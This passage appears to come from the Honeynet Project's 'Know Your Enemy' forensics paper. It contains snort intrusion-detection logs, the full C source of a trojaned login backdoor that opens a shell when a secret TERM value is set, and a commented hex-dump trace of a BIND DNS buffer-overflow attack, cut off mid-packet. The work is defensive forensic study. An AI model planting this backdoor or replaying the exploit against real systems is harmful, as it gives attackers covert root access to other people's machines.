-> 172.16.1.101:53 Apr 25 02:38:17 mozart snort[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 08:02:41 mozart snort[5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 08:02:41 mozart snort[5875]: IDS/DNS-version-query: 24.9.255.53:2991 -> 172.16.1.101:53 Apr 25 19:37:32 mozart snort[5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 mozart snort[6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 mozart snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:45:34 mozart snort[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 Apr 26 10:39:12 mozart snort[621]: spp_portscan: PORTSCAN DETECTED from 204.72.244.72 Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.101:53 Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.107:53 Apr 26 17:11:07 mozart snort[621]: IDS128/web-cgi-phf: 207.239.115.11:3536 -> 172.16.1.105:80 Apr 26 17:11:17 mozart snort[621]: IDS/DNS-version-query: 207.239.115.11:4727 -> 172.16.1.105:53 Apr 29 21:05:06 mozart snort[5358]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136 Apr 29 21:05:06 mozart snort[5358]: IDS198/SYN FIN Scan: 212.109.2.136:1080 -> 172.16.1.105:1080 Apr 30 02:06:37 mozart snort[5750]: spp_portscan: PORTSCAN DETECTED from 202.185.32.60 Apr 30 02:06:37 mozart snort[5750]: IDS198/SYN FIN Scan: 202.185.32.60:0 -> 172.16.1.101:143 May 1 04:03:40 mozart snort[6038]: spp_portscan: PORTSCAN DETECTED from 63.203.1.60 May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3083 May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3215 May 1 06:36:53 mozart snort[6038]: IDS212/dns-zone-transfer: 63.203.1.60:1089 -> 172.16.1.101:53 May 2 16:28:05 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1708 -> 172.16.1.101:53 May 2 16:28:40 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1715 -> 172.16.1.101:53 May 2 17:01:43 mozart snort[6443]: IDS/DNS-version-query: 24.114.97.247:3429 -> 172.16.1.101:53 May 3 19:17:53 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1 May 3 19:17:53 mozart snort[6862]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109 May 3 20:34:15 mozart snort[6862]: IDS/RPC-rpcinfo-query: 200.241.69.1:3697 -> 172.16.1.101:111 May 3 23:33:55 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 210.97.123.3 May 3 23:33:55 mozart snort[6862]: IDS198/SYN FIN Scan: 210.97.123.3:0 -> 172.16.1.105:109 May 4 04:59:35 mozart snort[7541]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1 May 4 04:59:35 mozart snort[7541]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109 May 4 15:32:17 mozart snort[7541]: IDS/DNS-version-query: 63.224.195.25:2293 -> 172.16.1.101:53 May 4 19:14:34 mozart snort[7541]: IDS/DNS-version-query: 12.10.173.249:3434 -> 172.16.1.101:53 May 5 06:06:52 mozart snort[8324]: IDS212/dns-zone-transfer: 211.38.95.197:2262 -> 172.16.1.101:53 May 5 08:35:48 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:953 -> 172.16.1.101:111 May 5 08:35:49 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:955 -> 172.16.1.101:111 May 5 08:35:53 mozart snort[8324]: IDS20/portmap-request-sadmind: 139.130.213.4:901 -> 172.16.1.101:111 May 5 08:35:54 mozart snort[8324]: IDS247/large-udp: 139.130.213.4:902 -> 172.16.1.101:32773 May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:954 -> 172.16.1.101:111 May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:956 -> 172.16.1.101:111 May 5 16:04:21 mozart snort[8324]: IDS/RPC-rpcinfo-query: 195.117.3.58:970 -> 172.16.1.101:111 May 5 17:04:28 mozart snort[8324]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136 May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.107:109 May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.101:109 May 5 17:42:24 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:2277 -> 172.16.1.101:53 May 5 17:46:28 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1831 -> 172.16.1.101:53 May 5 17:52:58 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1482 -> 172.16.1.101:53 May 5 17:58:16 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3310 -> 172.16.1.101:53 May 5 20:29:05 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1723 -> 172.16.1.101:53 May 5 20:32:01 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3132 -> 172.16.1.101:53 May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave) May 6 19:44:52 victim1.honeynet.org named[4991]: unapproved AXFR from [211.39.95.226].4958 for UICMBA.edu (not master/slave) May 7 19:22:22 victim1.honeynet.org named[4991]: unapproved AXFR from [216.190.204.3].1866 for UICMBA.edu (not master/slave) May 8 12:42:05 victim1.honeynet.org named[4991]: unapproved AXFR from [203.75.204.245].4542 for UICMBA.edu (not master/slave) May 8 21:53:03 lisa snort[387]: IDS118/Traceroute ICMP: 24.21.107.249 -> 172.16.1.104 May 8 21:58:40 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104 May 8 21:58:41 lisa snort[387]: spp_portscan: PORTSCAN DETECTED from 24.21.107.249 May 8 21:59:06 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104 May 8 22:16:06 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34536 -> 172.16.1.104:33457 May 8 22:16:45 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.80:34546 -> 172.16.1.104:33446 May 8 22:17:35 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34561 -> 172.16.1.104:33457 May 9 08:02:54 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 216.61.43.89 May 9 08:21:02 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 204.2.13.22 May 9 09:39:28 lisa snort[2370]: IDS212/dns-zone-transfer: 206.133.123.19:2421 -> 172.16.1.101:53 May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444 May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335 May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444 May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335 May 9 14:04:55 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 206.133.123.19 May 9 14:04:57 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1720 May 9 14:04:58 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1741 May 9 14:05:08 lisa snort[2370]: IDS128/web-cgi-phf: 206.133.123.19:1815 -> 172.16.1.107:80 May 9 14:05:09 lisa snort[2370]: IDS218/web-cgi-test-cgi: 206.133.123.19:1820 -> 172.16.1.107:80 May 9 14:05:09 lisa snort[2370]: IDS235/web-cgi-handler: 206.133.123.19:1824 -> 172.16.1.107:80 May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444 May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335 EoF the backdoor code bj.c Know your enemy #3: Forensics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #define _XOPEN_SOURCE #include #include #include #include #include #define SHELL "/bin/sh" #define SHELL_CALLME "login" #define LOGIN "/usr/bin/xstat" #define LOGIN_CALLME "login" #define ENV_NAME "TERM" #define ENV_VALUE "vt9111" #define ENV_FIX "r!!t!d" int owned(void); char **av, **ep; int main(int argc, char **argv, char **envp) { av=argv; ep=envp; av[0]=SHELL_CALLME; if (owned()) { char *sav[]={ SHELL_CALLME, NULL }; execve(SHELL, sav, ep); return 0; } execve(LOGIN, av, ep); return 0; } int owned(void) { char *name, *value; int i; for (i=0; ep[i]!=NULL; ++i) { name=strtok(ep[i], "="); value=strtok(NULL, "="); if (name==NULL || value==NULL) continue; if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) { if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) { char tmp[100]; sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX); ep[i]=strdup(tmp); return 1; } } } return 0; } EoF detailed forensic analysis of an attack Know your enemy #3 : Forensics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- COMMENT: The Tickle --- What you are looking at below are the decoded packets of the exploit. For this particular DNS exploit to work, the DNS victim must be recursive (as I soon learned). So, our black-hat has to determine that our victim DNS server is recursive. He first tests this by querying the DNS server to resolve 107.71.80.216.in-addr.arpa. If successful, he will then know our DNS server is recursive. Below you see the packets of the successfull, recursive lookup of 107.71.80.216.in-addr.arpa. 04/26-06:42:59.473423 213.28.22.189:1045 -> 172.16.1.107:53 UDP TTL:40 TOS:0x0 ID:18856 Len: 52 95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .j...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 dr.arpa..... 04/26-06:42:59.474405 172.16.1.107:1028 -> 128.8.10.90:53 UDP TTL:64 TOS:0x0 ID:18861 Len: 52 5C 21 01 00 00 01 00 00 00 00 00 00 03 31 30 37 \!...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 dr.arpa..... 04/26-06:42:59.574808 128.8.10.90:53 -> 172.16.1.107:1028 UDP TTL:48 TOS:0x0 ID:5077 Len: 135 5C 21 81 00 00 01 00 00 00 02 00 00 03 31 30 37 \!...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 02 37 31 02 dr.arpa......71. 38 30 03 32 31 36 07 49 4E 2D 41 44 44 52 04 61 80.216.IN-ADDR.a 72 70 61 00 00 02 00 01 00 07 E9 00 00 12 03 4E rpa............N 53 30 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 S0.ENTERACT.COM. C0 2C 00 02 00 01 00 07 E9 00 00 13 07 42 49 46 .,...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D C0 5B ROST.SEASTROM.[ 04/26-06:42:59.576169 172.16.1.107:1028 -> 198.32.64.12:53 UDP TTL:64 TOS:0x0 ID:18862 Len: 46 87 2A 00 00 00 01 00 00 00 00 00 00 07 42 49 46 .*...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO 4D 00 00 01 00 01 M..... 04/26-06:42:59.576953 172.16.1.107:1028 -> 198.32.64.12:53 UDP TTL:64 TOS:0x0 ID:18863 Len: 42 DA 57 00 00 00 01 00 00 00 00 00 00 03 4E 53 30 .W...........NS0 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM... 00 01 .. 04/26-06:43:00.215765 198.32.64.12:53 -> 172.16.1.107:1028 UDP TTL:51 TOS:0x0 ID:42900 Len: 462 87 2A 80 00 00 01 00 00 00 0C 00 0C 07 42 49 46 .*...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO 4D 00 00 01 00 01 03 43 4F 4D 00 00 02 00 01 00 M......COM...... 07 E9 00 00 14 01 41 0C 52 4F 4F 54 2D 53 45 52 ......A.ROOT-SER 56 45 52 53 03 4E 45 54 00 C0 26 00 02 00 01 00 VERS.NET..&..... 07 E9 00 00 04 01 47 C0 37 C0 26 00 02 00 01 00 ......G.7.&..... 07 E9 00 00 11 01 46 0C 47 54 4C 44 2D 53 45 52 ......F.GTLD-SER 56 45 52 53 C0 44 C0 26 00 02 00 01 00 07 E9 00 VERS.D.&........ 00 04 01 46 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...F.7.&........ 00 04 01 49 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...I.7.&........ 00 04 01 45 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...E.7.&........ 00 04 01 4A C0 67 C0 26 00 02 00 01 00 07 E9 00 ...J.g.&........ 00 04 01 4B C0 67 C0 26 00 02 00 01 00 07 E9 00 ...K.g.&........ 00 04 01 41 C0 67 C0 26 00 02 00 01 00 07 E9 00 ...A.g.&........ 00 04 01 4D C0 67 C0 26 00 02 00 01 00 07 E9 00 ...M.g.&........ 00 04 01 48 C0 67 C0 26 00 02 00 01 00 07 E9 00 ...H.g.&........ 00 04 01 43 C0 67 C0 35 00 01 00 01 00 36 EE 80 ...C.g.5.....6.. 00 04 C6 29 00 04 C0 55 00 01 00 01 00 36 EE 80 ...)...U.....6.. 00 04 C0 70 24 04 C0 65 00 01 00 01 00 07 E9 00 ...p$..e........ 00 04 C6 11 D0 43 C0 82 00 01 00 01 00 36 EE 80 .....C.......6.. 00 04 C0 05 05 F1 C0 92 00 01 00 01 00 36 EE 80 .............6.. 00 04 C0 24 94 11 C0 A2 00 01 00 01 00 36 EE 80 ...$.........6.. 00 04 C0 CB E6 0A C0 B2 00 01 00 01 00 07 E9 00 ................ 00 04 C6 29 00 15 C0 C2 00 01 00 01 00 07 E9 00 ...)............ 00 04 C3 08 63 0B C0 D2 00 01 00 01 00 07 E9 00 ....c........... 00 04 C6 29 03 26 C0 E2 00 01 00 01 00 07 E9 00 ...).&.......... 00 04 D2 B0 98 12 C0 F2 00 01 00 01 00 07 E9 00 ................ 00 04 D8 21 4B 52 C1 02 00 01 00 01 00 07 E9 00 ...!KR.......... 00 04 CD BC B9 12 ...... 04/26-06:43:00.218808 172.16.1.107:1028 -> 205.188.185.18:53 UDP TTL:64 TOS:0x0 ID:18864 Len: 46 E6 38 00 00 00 01 00 00 00 00 00 00 07 42 49 46 .8...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO 4D 00 00 01 00 01 M..... 04/26-06:43:00.220217 198.32.64.12:53 -> 172.16.1.107:1028 UDP TTL:51 TOS:0x0 ID:42903 Len: 458 DA 57 80 00 00 01 00 00 00 0C 00 0C 03 4E 53 30 .W...........NS0 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM... 00 01 03 43 4F 4D 00 00 02 00 01 00 07 E9 00 00 ...COM.......... 14 01 41 0C 52 4F 4F 54 2D 53 45 52 56 45 52 53 ..A.ROOT-SERVERS 03 4E 45 54 00 C0 22 00 02 00 01 00 07 E9 00 00 .NET.."......... 04 01 47 C0 33 C0 22 00 02 00 01 00 07 E9 00 00 ..G.3."......... 11 01 46 0C 47 54 4C 44 2D 53 45 52 56 45 52 53 ..F.GTLD-SERVERS C0 40 C0 22 00 02 00 01 00 07 E9 00 00 04 01 46 .@."...........F C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 49 .3."...........I C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 45 .3."...........E C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4A .3."...........J C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4B .c."...........K C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 41 .c."...........A C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4D .c."...........M C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 48 .c."...........H C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 43 .c."...........C C0 63 C0 31 00 01 00 01 00 36 EE 80 00 04 C6 29 .c.1.....6.....) 00 04 C0 51 00 01 00 01 00 36 EE 80 00 04 C0 70 ...Q.....6.....p 24 04 C0 61 00 01 00 01 00 07 E9 00 00 04 C6 11 $..a............ D0 43 C0 7E 00 01 00 01 00 36 EE 80 00 04 C0 05 .C.~.....6...... 05 F1 C0 8E 00 01 00 01 00 36 EE 80 00 04 C0 24 .........6.....$ 94 11 C0 9E 00 01 00 01 00 36 EE 80 00 04 C0 CB .........6...... E6 0A C0 AE 00 01 00 01 00 07 E9 00 00 04 C6 29 ...............) 00 15 C0 BE 00 01 00 01 00 07 E9 00 00 04 C3 08 ................ 63 0B C0 CE 00 01 00 01 00 07 E9 00 00 04 C6 29 c..............) 03 26 C0 DE 00 01 00 01 00 07 E9 00 00 04 D2 B0 .&.............. 98 12 C0 EE 00 01 00 01 00 07 E9 00 00 04 D8 21 ...............! 4B 52 C0 FE 00 01 00 01 00 07 E9 00 00 04 CD BC KR.............. B9 12 .. 04/26-06:43:00.222098 172.16.1.107:1028 -> 205.188.185.18:53 UDP TTL:64 TOS:0x0 ID:18865 Len: 42 3D 9D 00 00 00 01 00 00 00 00 00 00 03 4E 53 30 =............NS0 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM... 00 01 .. 04/26-06:43:00.315827 205.188.185.18:53 -> 172.16.1.107:1028 UDP TTL:240 TOS:0x0 ID:40907 DF Len: 147 E6 38 80 00 00 01 00 01 00 02 00 02 07 42 49 46 .8...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO 4D 00 00 01 00 01 C0 0C 00 01 00 01 00 02 A3 00 M............... 00 04 C0 94 FC 0A 08 53 45 41 53 54 52 4F 4D 03 .......SEASTROM. 63 6F 6D 00 00 02 00 01 00 02 A3 00 00 02 C0 0C com............. C0 36 00 02 00 01 00 02 A3 00 00 0F 03 4E 53 30 .6...........NS0 08 45 4E 54 45 52 41 43 54 C0 3F C0 0C 00 01 00 .ENTERACT.?..... 01 00 02 A3 00 00 04 C0 94 FC 0A C0 5C 00 01 00 ............\... 01 00 02 A3 00 00 04 CF E5 8F 03 ........... 04/26-06:43:00.317904 205.188.185.18:53 -> 172.16.1.107:1028 UDP TTL:240 TOS:0x0 ID:40908 DF Len: 147 3D 9D 80 00 00 01 00 01 00 02 00 02 03 4E 53 30 =............NS0 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM... 00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 CF E5 ................ 8F 03 08 45 4E 54 45 52 41 43 54 03 63 6F 6D 00 ...ENTERACT.com. 00 02 00 01 00 02 A3 00 00 13 07 42 49 46 52 4F ...........BIFRO 53 54 08 53 45 41 53 54 52 4F 4D C0 3B C0 32 00 ST.SEASTROM.;.2. 02 00 01 00 02 A3 00 00 02 C0 0C C0 4A 00 01 00 ............J... 01 00 02 A3 00 00 04 C0 94 FC 0A C0 0C 00 01 00 ................ 01 00 02 A3 00 00 04 CF E5 8F 03 ........... 04/26-06:43:04.462930 213.28.22.189:1045 -> 172.16.1.107:53 UDP TTL:40 TOS:0x0 ID:18880 Len: 52 95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .j...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 dr.arpa..... 04/26-06:43:04.463599 172.16.1.107:1028 -> 192.148.252.10:53 UDP TTL:64 TOS:0x0 ID:18866 Len: 52 F1 8E 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .............107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 dr.arpa..... 04/26-06:43:04.559157 192.148.252.10:53 -> 172.16.1.107:1028 UDP TTL:54 TOS:0x0 ID:7629 Len: 196 F1 8E 85 80 00 01 00 01 00 02 00 02 03 31 30 37 .............107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C dr.arpa......... 00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69 ....Q....11.lspi 74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74 tz.soho.enteract 03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07 .com..71.80.216. 49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00 IN-ADDR.ARPA.... 01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00 ...Q....ns0.G.U. 02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73 .....Q....bifros 74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01 t.seastrom.P.w.. 00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01 ................ 00 01 00 00 0E 10 00 04 C0 94 FC 0A ............ 04/26-06:43:04.560130 172.16.1.107:53 -> 213.28.22.189:1045 UDP TTL:64 TOS:0x0 ID:18867 Len: 196 95 6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37 .j...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C dr.arpa......... 00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69 ....Q....11.lspi 74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74 tz.soho.enteract 03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07 .com..71.80.216. 49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00 IN-ADDR.ARPA.... 01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00 ...Q....ns0.G.U. 02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73 .....Q....bifros 74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01 t.seastrom.P.w.. 00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01 ................ 00 01 00 00 0E 10 00 04 C0 94 FC 0A ............ ---- COMMENT: Tickle Worked ---- The recursvie lookup worked. Not only is our system running a vulnerable version of named, but it is recuresive. The black-hat now queries our DNS server for the name r.rsavings.net. This is extrmelly odd, why would a remote system query my DNS server for a different domain name? As we will soon learn, this is how the exploit works. Our DNS server is being suckered. Read below as our DNS server recursively attempts to find the NS for savings.net so it can query the IP Address (A record) of r.rsavings.net. 04/26-06:43:04.883506 213.28.22.189:1045 -> 172.16.1.107:53 UDP TTL:40 TOS:0x0 ID:18882 Len: 40 95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .k...........r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 04/26-06:43:04.884189 172.16.1.107:1028 -> 198.41.0.21:53 UDP TTL:64 TOS:0x0 ID:18868 Len: 40 F7 F5 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .............r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 04/26-06:43:04.969435 198.41.0.21:53 -> 172.16.1.107:1028 UDP TTL:244 TOS:0x0 ID:56421 DF Len: 202 F7 F5 81 00 00 01 00 00 00 04 00 04 01 72 08 72 .............r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 08 52 53 41 56 49 4E 47 53 03 4E 45 54 00 00 02 .RSAVINGS.NET... 00 01 00 02 A3 00 00 12 03 4E 53 33 08 4D 59 44 .........NS3.MYD 4F 4D 41 49 4E 03 43 4F 4D 00 C0 20 00 02 00 01 OMAIN.COM.. .... 00 02 A3 00 00 06 03 4E 53 34 C0 3C C0 20 00 02 .......NS4.<. .. 00 01 00 02 A3 00 00 06 03 57 57 57 C0 20 C0 20 .........WWW. . 00 02 00 01 00 02 A3 00 00 08 05 53 45 52 56 32 ...........SERV2 C0 20 C0 38 00 01 00 01 00 02 A3 00 00 04 D8 22 . .8..........." 59 03 C0 56 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..V..........." 59 04 C0 68 00 01 00 01 00 02 A3 00 00 04 3F E2 Y..h..........?. 51 0D C0 7A 00 01 00 01 00 02 A3 00 00 04 3F E2 Q..z..........?. 51 0C Q. 04/26-06:43:04.970963 172.16.1.107:1028 -> 198.41.3.38:53 UDP TTL:64 TOS:0x0 ID:18869 Len: 42 C2 4E 00 00 00 01 00 00 00 00 00 00 03 4E 53 34 .N...........NS4 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM... 00 01 .. 04/26-06:43:04.971751 172.16.1.107:1028 -> 198.41.3.38:53 UDP TTL:64 TOS:0x0 ID:18870 Len: 42 F2 0B 00 00 00 01 00 00 00 00 00 00 03 4E 53 33 .............NS3 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM... 00 01 .. 04/26-06:43:04.972052 172.16.1.107:1028 -> 63.226.81.13:53 UDP TTL:64 TOS:0x0 ID:18871 Len: 40 0C BC 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .............r.r 73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net..... 04/26-06:43:05.063551 198.41.3.38:53 -> 172.16.1.107:1028 UDP TTL:242 TOS:0x0 ID:42903 DF Len: 202 C2 4E 80 00 00 01 00 01 00 04 00 04 03 4E 53 34 .N...........NS4 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM... 00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 ..............." 59 04 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 Y..MYDOMAIN.COM. 00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32 ...........NS1.2 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32 .2...........NS2 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E .2.2...........N 53 33 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 S3.2.2.......... C0 0C C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22 ...J..........." 59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..\..........." 59 02 C0 6E 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..n..........." 59 03 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y.............." 59 04 Y. 04/26-06:43:05.065790 198.41.3.38:53 -> 172.16.1.107:1028 UDP TTL:242 TOS:0x0 ID:42904 DF Len: 202 F2 0B 80 00 00 01 00 01 00 04 00 04 03 4E 53 33 .............NS3 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM... 00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 ..............." 59 03 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 Y..MYDOMAIN.COM. 00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32 ...........NS1.2 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32 .2...........NS2 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 C0 0C .2.2............ C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 34 .2...........NS4 C0 32 C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22 .2.J..........." 59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..\..........." 59 02 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y.............." 59 03 C0 7C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..|..........." 59 04 Y. --- COMMENT: Buffer Overflow! --- Our nameserver identifies the nameserver for rsavings.net, 63.226.81.13. Our simple UDP DNS request for r.rsavings.net should have resulted in a simple UDP reply containing an answer. However, we get a TCP connection instead, which isused the buffer overflow attack. The following packets are the actual buffer overflow attack. Notice the '/bin/sh' script ran at the end of the buffer overflow. That is the whole purpose of the exploit. NOTE: Based on passive fingerprinting, another forensic tool, this system also appears to be Linux box. 04/26-06:43:05.096725 63.226.81.13:1351 -> 172.16.1.107:53 TCP TTL:49 TOS:0x0 ID:26472 DF **S***** Seq: 0x45B8E7 Ack: 0x0 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 4037587 0 NOP WS: 0 04/26-06:43:05.097443 172.16.1.107:53 -> 63.226.81.13:1351 TCP TTL:64 TOS:0x0 ID:18872 DF **S***A* Seq: 